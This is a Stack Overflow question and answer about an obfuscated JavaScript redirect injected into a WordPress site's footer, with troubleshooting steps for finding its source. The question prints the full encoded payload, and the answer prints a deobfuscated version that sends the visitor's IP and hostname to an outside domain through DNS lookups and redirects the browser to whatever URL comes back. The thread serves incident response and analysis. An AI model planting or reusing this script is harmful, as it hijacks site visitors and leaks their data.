# Javascript injection redirect hack code in WordPress footer, where is it coming from?

Tags: javascript, wordpress, footer, code-injection

I'm desperately trying to find this set of codes injected in the footer of my WordPress website. The scanner plugin can't find it. My hosting provider ran a scan, but couldn't find it either. I manually searched for the code in website files in Visual Studio Code, nothing.

Here's the full malicious code below. The numbers translate into a malicious external domain. The website is `vulair.com`.

Thanks so much for your help in advance guys!!

[image: Inspector Picture]

```
    <script>
      document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 118, 97, 114, 32, 95, 36, 95, 97, 55, 57, 56, 61, 91, 34, 92, 120, 50, 69, 34, 44, 34, 92, 120, 50, 68, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 48, 92, 120, 54, 67, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 53, 92, 120, 52, 49, 92, 120, 54, 67, 92, 120, 54, 67, 34, 44, 34, 92, 120, 54, 57, 92, 120, 55, 48, 34, 44, 34, 92, 120, 51, 65, 34, 44, 34, 92, 120, 54, 56, 92, 120, 54, 70, 92, 120, 55, 51, 92, 120, 55, 52, 92, 120, 54, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 34, 44, 34, 92, 120, 54, 67, 92, 120, 54, 70, 92, 120, 54, 51, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 57, 92, 120, 54, 70, 92, 120, 54, 69, 34, 44, 34, 34, 44, 34, 92, 120, 55, 53, 92, 120, 54, 69, 92, 120, 54, 66, 92, 120, 50, 69, 92, 120, 54, 51, 92, 120, 54, 70, 92, 120, 54, 68, 34, 44, 34, 92, 120, 52, 49, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 55, 55, 92, 120, 54, 53, 92, 120, 55, 50, 34, 44, 34, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 34, 44, 34, 92, 120, 54, 52, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 54, 49, 34, 44, 34, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 52, 53, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 56, 34, 44, 34, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 54, 69, 92, 120, 54, 55, 92, 120, 55, 52, 92, 120, 54, 56, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 48, 92, 120, 54, 67, 92, 120, 54, 49, 92, 120, 54, 51, 92, 120, 54, 53, 34, 44, 34, 92, 120, 55, 52, 92, 120, 54, 56, 92, 120, 54, 53, 92, 120, 54, 69, 34, 44, 34, 92, 120, 54, 65, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 69, 34, 44, 34, 92, 120, 54, 56, 92, 120, 55, 52, 92, 120, 55, 52, 92, 120, 55, 48, 92, 120, 55, 51, 92, 120, 51, 65, 92, 120, 50, 70, 92, 120, 50, 70, 92, 120, 54, 52, 92, 120, 54, 69, 92, 120, 55, 51, 92, 120, 50, 69, 92, 120, 54, 55, 92, 120, 54, 70, 92, 120, 54, 70, 92, 120, 54, 55, 92, 120, 54, 67, 92, 120, 54, 53, 92, 120, 50, 70, 92, 120, 55, 50, 92, 120, 54, 53, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 67, 92, 120, 55, 54, 92, 120, 54, 53, 92, 120, 51, 70, 92, 120, 54, 69, 92, 120, 54, 49, 92, 120, 54, 68, 92, 120, 54, 53, 92, 120, 51, 68, 34, 44, 34, 92, 120, 55, 50, 92, 120, 54, 49, 92, 120, 54, 69, 92, 120, 54, 52, 92, 120, 54, 70, 92, 120, 54, 68, 34, 44, 34, 92, 120, 54, 54, 92, 120, 54, 67, 92, 120, 54, 70, 92, 120, 54, 70, 92, 120, 55, 50, 34, 44, 34, 92, 120, 50, 69, 92, 120, 54, 49, 92, 120, 54, 52, 92, 120, 55, 51, 92, 120, 50, 68, 92, 120, 55, 48, 92, 120, 55, 50, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 54, 70, 92, 120, 50, 69, 92, 120, 54, 51, 92, 120, 54, 70, 92, 120, 54, 68, 92, 120, 50, 54, 92, 120, 55, 52, 92, 120, 55, 57, 92, 120, 55, 48, 92, 120, 54, 53, 92, 120, 51, 68, 92, 120, 55, 52, 92, 120, 55, 56, 92, 120, 55, 52, 34, 44, 34, 92, 120, 54, 56, 92, 120, 55, 52, 92, 120, 55, 52, 92, 120, 55, 48, 92, 120, 55, 51, 92, 120, 51, 65, 92, 120, 50, 70, 92, 120, 50, 70, 92, 120, 54, 49, 92, 120, 55, 48, 92, 120, 54, 57, 92, 120, 51, 54, 92, 120, 51, 52, 92, 120, 50, 69, 92, 120, 54, 57, 92, 120, 55, 48, 92, 120, 54, 57, 92, 120, 54, 54, 92, 120, 55, 57, 92, 120, 50, 69, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 55, 92, 120, 51, 70, 92, 120, 54, 54, 92, 120, 54, 70, 92, 120, 55, 50, 92, 120, 54, 68, 92, 120, 54, 49, 92, 120, 55, 52, 92, 120, 51, 68, 92, 120, 54, 65, 92, 120, 55, 51, 92, 120, 54, 70, 92, 120, 54, 69, 34, 93, 59, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 95, 48, 120, 49, 67, 55, 68, 52, 41, 123, 102, 101, 116, 99, 104, 40, 95, 36, 95, 97, 55, 57, 56, 91, 50, 49, 93, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 49, 68, 41, 61, 62, 95, 48, 120, 49, 67, 56, 49, 68, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 54, 93, 93, 40, 41, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 65, 70, 41, 61, 62, 123, 95, 48, 120, 49, 67, 56, 65, 70, 61, 32, 95, 48, 120, 49, 67, 56, 65, 70, 91, 95, 36, 95, 97, 55, 57, 56, 91, 51, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 50, 93, 93, 40, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 44, 95, 36, 95, 97, 55, 57, 56, 91, 49, 93, 41, 59, 95, 48, 120, 49, 67, 56, 65, 70, 61, 32, 95, 48, 120, 49, 67, 56, 65, 70, 91, 95, 36, 95, 97, 55, 57, 56, 91, 50, 93, 93, 40, 95, 36, 95, 97, 55, 57, 56, 91, 52, 93, 44, 95, 36, 95, 97, 55, 57, 56, 91, 49, 93, 41, 59, 108, 101, 116, 32, 95, 48, 120, 49, 67, 56, 54, 54, 61, 119, 105, 110, 100, 111, 119, 91, 95, 36, 95, 97, 55, 57, 56, 91, 54, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 53, 93, 93, 59, 105, 102, 40, 95, 48, 120, 49, 67, 56, 54, 54, 61, 61, 32, 95, 36, 95, 97, 55, 57, 56, 91, 55, 93, 41, 123, 95, 48, 120, 49, 67, 56, 54, 54, 61, 32, 95, 36, 95, 97, 55, 57, 56, 91, 56, 93, 125, 59, 102, 101, 116, 99, 104, 40, 95, 36, 95, 97, 55, 57, 56, 91, 49, 55, 93, 43, 32, 95, 48, 120, 49, 67, 56, 54, 54, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 43, 32, 95, 48, 120, 49, 67, 56, 65, 70, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 48, 93, 43, 32, 77, 97, 116, 104, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 57, 93, 93, 40, 77, 97, 116, 104, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 56, 93, 93, 40, 41, 42, 32, 49, 48, 50, 52, 42, 32, 49, 48, 50, 52, 42, 32, 49, 48, 41, 43, 32, 95, 36, 95, 97, 55, 57, 56, 91, 50, 48, 93, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 49, 68, 41, 61, 62, 95, 48, 120, 49, 67, 56, 49, 68, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 54, 93, 93, 40, 41, 41, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 53, 93, 93, 40, 40, 95, 48, 120, 49, 67, 56, 70, 56, 41, 61, 62, 123, 105, 102, 40, 95, 48, 120, 49, 67, 56, 70, 56, 91, 95, 36, 95, 97, 55, 57, 56, 91, 57, 93, 93, 61, 61, 32, 110, 117, 108, 108, 41, 123, 114, 101, 116, 117, 114, 110, 125, 59, 118, 97, 114, 32, 95, 48, 120, 49, 67, 57, 52, 49, 61, 95, 36, 95, 97, 55, 57, 56, 91, 55, 93, 59, 95, 48, 120, 49, 67, 56, 70, 56, 91, 95, 36, 95, 97, 55, 57, 56, 91, 57, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 50, 93, 93, 40, 40, 95, 48, 120, 49, 67, 57, 56, 65, 41, 61, 62, 123, 105, 102, 40, 95, 48, 120, 49, 67, 57, 56, 65, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 48, 93, 93, 61, 61, 32, 49, 54, 41, 123, 95, 48, 120, 49, 67, 57, 52, 49, 43, 61, 32, 95, 48, 120, 49, 67, 57, 56, 65, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 49, 93, 93, 125, 125, 41, 59, 95, 48, 120, 49, 67, 57, 52, 49, 61, 32, 97, 116, 111, 98, 40, 95, 48, 120, 49, 67, 57, 52, 49, 41, 59, 105, 102, 40, 33, 95, 48, 120, 49, 67, 57, 52, 49, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 51, 93, 93, 41, 123, 114, 101, 116, 117, 114, 110, 125, 59, 119, 105, 110, 100, 111, 119, 91, 95, 36, 95, 97, 55, 57, 56, 91, 54, 93, 93, 91, 95, 36, 95, 97, 55, 57, 56, 91, 49, 52, 93, 93, 40, 95, 48, 120, 49, 67, 57, 52, 49, 41, 125, 41, 125, 41, 125, 41, 40, 41, 60, 47, 115, 99, 114, 105, 112, 116, 62));
    </script>
    <link rel='stylesheet' id='so-css-astra-css' href='http://vulair.com/wp-content/uploads/so-css/so-css-astra.css?ver=1696128972' media='all' />
```

Comment: I'm not entirely sure this Stack Overflow is the right place for this question.  This feels more up the "Information Security" StackExchange.

Comment: That has *multiple* layers of obfuscation. That will take a fair amount of time and effort to unscramble.

Comment: With a couple of minutes of trying, I got to here: https://gist.github.com/carcigenicate/9c02cf4ec573f4889223bddb00d72f10. That's still a far cry from readable though.

Answer (score 0):

It will be very hard to pin-point such obfuscated injection, but you can try to locate approximate scope of injection:

1. Turn off all plugins and check if it is still being injected. If not - turn them on one by one.
2. Repeat the same steps with theme. Switch temporarily to Wordpress default theme.
3. If you're using cache - try disabling it (not deleting it - so you can investigate later) and see if it helps to locate it.

If the above steps didn't help, you can also try dumping all `hooks` (add this to your theme's `function.php`:

```php
print_r($GLOBALS['wp_filter']);
```

and double check `crons`:

```php
$cron_jobs = get_option( 'cron' );
var_dump($cron_jobs);
```

This may help you locate if injection is being called from within Wordpress.

On server side, you can try to search for all web server configuration files (such as `.htaccess` for Apache or `nginx.conf` for Nginx) and then investigating their paths and code within.

I went and tried to deobfuscate the code and this is what i got:

```js
(function (_0x1C7D4) {
    fetch('https://api64.ipify.org?format=json').then(_0x1C81D => _0x1C81D.json()).then(_0x1C8AF => {
        _0x1C8AF = _0x1C8AF.ip.replaceAll('.', '-');
        _0x1C8AF = _0x1C8AF.replaceAll(':', '-');
        let _0x1C866 = window.location.hostname;
        if (_0x1C866 == '') {
            _0x1C866 = 'unk.com';
        };
        fetch('https://dns.google/resolve?name=' + _0x1C866 + '.' + _0x1C8AF + '.' + Math.floor(Math.random() * 1024 * 1024 * 10) + '.ads-promo.com&type=txt').then(_0x1C81D => _0x1C81D.json()).then(_0x1C8F8 => {
            if (_0x1C8F8.Answer == null) {
                return;
            };
            var _0x1C941 = '';
            _0x1C8F8.Answer.forEach(_0x1C98A => {
                if (_0x1C98A.type == 16) {
                    _0x1C941 += _0x1C98A.data;
                }
            });
            _0x1C941 = atob(_0x1C941);
            if (!_0x1C941.length) {
                return;
            };
            window.location.replace(_0x1C941);
        });
    });
})();
```